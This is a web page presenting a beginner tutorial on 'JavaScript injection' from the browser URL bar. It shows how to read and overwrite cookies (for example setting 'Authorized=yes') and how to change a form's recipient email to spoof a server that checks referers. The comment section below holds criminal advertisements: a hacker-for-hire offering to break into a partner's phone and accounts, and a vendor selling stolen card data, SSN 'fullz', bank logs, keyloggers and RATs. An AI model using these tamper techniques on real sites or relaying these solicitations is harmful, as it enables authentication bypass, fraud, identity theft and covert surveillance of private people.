Advance Javascript Injection Tutorial
Summary: JavaScript injection is a nifty little technique that allows you to alter a sites contents without actually leaving the site. This can be very useful when say, you need to spoof the server by editing some form options.
Examples will be explained throughout.
Contents:
I. Injection Basics
II. Cookie Editing
III. Form Editing
IV. Defacing
I. Injection Basics JavaScript injections
are run from the URL bar of the page you are visiting.
To use them, you must first completely empty the URL from the URL bar.
That means no http:// or whatever.JavaScript is run from the URL bar by using the JavaScript: protocol.
In this tutorial I will only teach you the bare bones of using this, but if you are a JavaScript guru, you can expand on this using plain old JavaScript.
The two commands covered in this tutorialare the alert(); and void(); commands. These are pretty much all you will need in most situations. For your first JavaScript, you will make a simple window appear, first go to any website and then type the following into your URL bar:
Code:
javascript:alert('Hello, Emmybxt');
You should get a little dialog box that says"Hello, Emmybxt". This will be altered later to have more practical uses.You can also have more than one command run at the same time:
Code:
javascript:alert('Hello'); alert('Emmybxt');
This would pop up a box that said 'Hello' and than another that says 'Emmybxt'.
II. Cookie Editing
First off check to see if the site you are visiting has set any cookies by using this script:
Code:
javascript:alert(document.cookie);
This will pop up any information stored in the sites cookies. To edit any information, we make use of the void(); command.
Code:
javascript:void(document.cookie="Field = myValue");
This command can either alter existing information or create entirely new values. Replace "Field" with either an existing field found using the alert(document.cookie); command, or insert your very own value. Then replace"myValue" with whatever you want the field to be. For example:
Code:
javascript:void(document.cookie="Authorized=yes");
Would either make the field "authorized" or edit it to say "yes"... now whether or not this does anything of value depends on the site you are injecting it on.It is also useful to tack an alert(document.cookie); at the end of the same line to see what effect your altering had.
III. Form Editing
Sometimes, to edit values sent to a given website through a form, you can simply download that html and edit it slightly to allow you to submit what you want. However, sometimes the website checks to see if you actually submitted it from the website you were supposed to. To get around this, we can just edit the form straight from JavaScript. Note: The changes are only temporary, so it's no use trying to deface a site through JavaScript injection like this.
Every form on a given webpage (unless named otherwise) is stored in the forms[x] array... where "x" is the number, in order from top to bottom, of all the forms in a page. Note that the forms start at 0, so the first form on the page would actually be 0, and the second would be 1 and so on. Lets take this example:
Code:
<*form action="http://www.website.com/submit.php" method="post">
Note:Remove * ....Since this is the first form on the page, it is forms[0] Say this form was used to email, say vital server information to the admin of the website. You can't just download the scriptand edit it because the submit.php page looks for a referer.
You can check to see what value a certain form element has by using this script:
Code:
javascript:alert(document.forms[0].to.value);
This is similar to the alert(document.cookie); discussed previously. In this case, It would pop up analert that says "admin@website.com"So here's how to Inject your email into it.
You can use pretty much the same technique as the cookies editing shown earlier:
Code:
javascript:void(document.forms[0].to.value="email@nhacks.com");
This would change the email of the form tobe "email@nhacks.com".
Then you could use the alert(); script shown above to check your work. Or you can couple both of these commands on one line.
More Will Be Droped.Keep Checking!
Was this tutorial helpful? Post your Comment
3 comments
Write commentsBRO PLEASE I DIDNT UNDERSTAND IT CAN YOU EXPLAIN.
ReplyI basically think we all dont have to face all the deceits and lies from our spouse…in a case of mine when i got sick and tired of all the lies and deceit i had to contact a friend of mine to get me the contact of one of the best hackers in the states ..then i met @ blackhatthacker@gmail.com..She saved me from the lies of my cheating girlfriend by hacking her phone number,Emial,Whatsapps and Facebook account. You can contact her for any hack problems and you consider it done soon as you send your first email to her. Tell her Keisha referred you to her
Reply@killhacks = ICQ/Telegram
Replypeeterhacks = Wickr/Skype
Fullz/Pros/Leads & Tools with Tutorials
CC Fullz with All Info
Dumps With Pin codes
SSN DOB Fullz
SSN DOB DL Fullz with Employee Info
High Credit Scores Fullz
Business EIN Fullz
Bank Account Fullz
Tools With Tutorials/Ebooks/Video Tutorials
SMTP's/RDP's/Shells/C-panels
Spa-mming Tools & Tuts
Vir-uses/RAT's/Brutes
Mailer/Senders/Bomber
Key-Loggers/SQLi Injector
BTC Cracker/Flasher
FB/WA Ha-cking Tutorlials & tools
Kali-Linux Master Class
Combos/Logs
PayPal Logs
All stuff will be genuine & fresh spammed
Invalid or Wrong stuff will be replaced
Guidance will be provided if needed
Complete Packages For Ha-cking, Spamming, Carding Methods Are available
@leadsupplier = Tel.gram
752.822.040 = I.C.Q